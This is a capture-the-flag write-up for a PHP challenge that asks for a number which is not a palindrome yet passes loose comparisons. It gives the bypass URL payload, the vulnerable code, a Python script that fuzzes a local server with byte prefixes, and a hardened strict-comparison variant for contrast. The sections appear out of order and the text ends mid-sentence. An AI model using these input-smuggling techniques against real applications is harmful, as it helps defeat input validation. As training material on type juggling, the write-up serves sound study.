http://127.0.0.1/Php_Bug/02.php?number=%00%2B191

%2B decodes to +, '+191'=='191' and intval('191+')==191

The approach to solving this challenge is as follows:
```php
<?php
function is_palindrome_number($number) {
    $number = strval($number); // strval: get the string value of a variable
    $i = 0;
    $j = strlen($number) - 1; // strlen: get the string length
    while ($i < $j) {
        if ($number[$i] !== $number[$j]) {
            return false;
        }
        $i++;
        $j--;
    }
    return true;
}

$a = trim($_GET['number']);
var_dump(($a == strval(intval($a))) & (intval($a) == intval(strrev($a))) & !is_palindrome_number($a))
?>
```
The fuzzing code is as follows:
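```python
import requests

# Try every single-byte prefix (%00..%FF) in front of "191".
for i in range(256):
    rq = requests.get("http://127.0.0.1/vuln/CTF/1/index.php?number=%s191" % ("%%%02X" % i))
    # var_dump() prints int(1) when all three conditions hold.
    if '1' in rq.text:
        print("%%%02X" % i)
```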
The fuzzing results are as follows:
%0C %2B
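
The loose comparison this challenge turns on, next to a strict variant, as an added example that is not part of the original issue. `loose_check` reproduces the posted condition, `strict_check` is a hypothetical hardened form (digits only via `ctype_digit`, `===` instead of `==`), and the loop repeats the fuzzing sweep in-process instead of over HTTP.

```php
<?php
// Added example, not code from the original issue.

// Palindrome test, same logic as the challenge code.
function is_palindrome_number($number) {
    $number = strval($number);
    for ($i = 0, $j = strlen($number) - 1; $i < $j; $i++, $j--) {
        if ($number[$i] !== $number[$j]) {
            return false;
        }
    }
    return true;
}

// The challenge's condition as posted: loose == and bitwise &.
function loose_check(string $raw): bool {
    $a = trim($raw);
    return (bool)(($a == strval(intval($a)))
        & (intval($a) == intval(strrev($a)))
        & !is_palindrome_number($a));
}

// Hypothetical hardened variant: reject anything that is not plain
// decimal digits, then compare with === so no type juggling occurs.
function strict_check(string $raw): bool {
    $a = trim($raw);
    if (!ctype_digit($a)) {
        return false;
    }
    return $a === strval(intval($a))
        && intval($a) === intval(strrev($a))
        && !is_palindrome_number($a);
}

// Same sweep as the fuzzing script: one byte prefix followed by "191".
// chr($i) stands in for the URL-decoded %XX value.
for ($i = 0; $i < 256; $i++) {
    $input = chr($i) . '191';
    $loose = loose_check($input);
    $strict = strict_check($input);
    if ($loose || $strict) {
        printf("%%%02X loose=%s strict=%s\n", $i,
            var_export($loose, true), var_export($strict, true));
    }
}
```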
Learned something.
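Looking at the conditions above, condition 4 requires adding a character, but once it is added conditions 2 and 3 must still be satisfied, so conditions 2, 3 and 4 can be extracted from the original challenge and used for fuzzing. The simplified backend code is as follows: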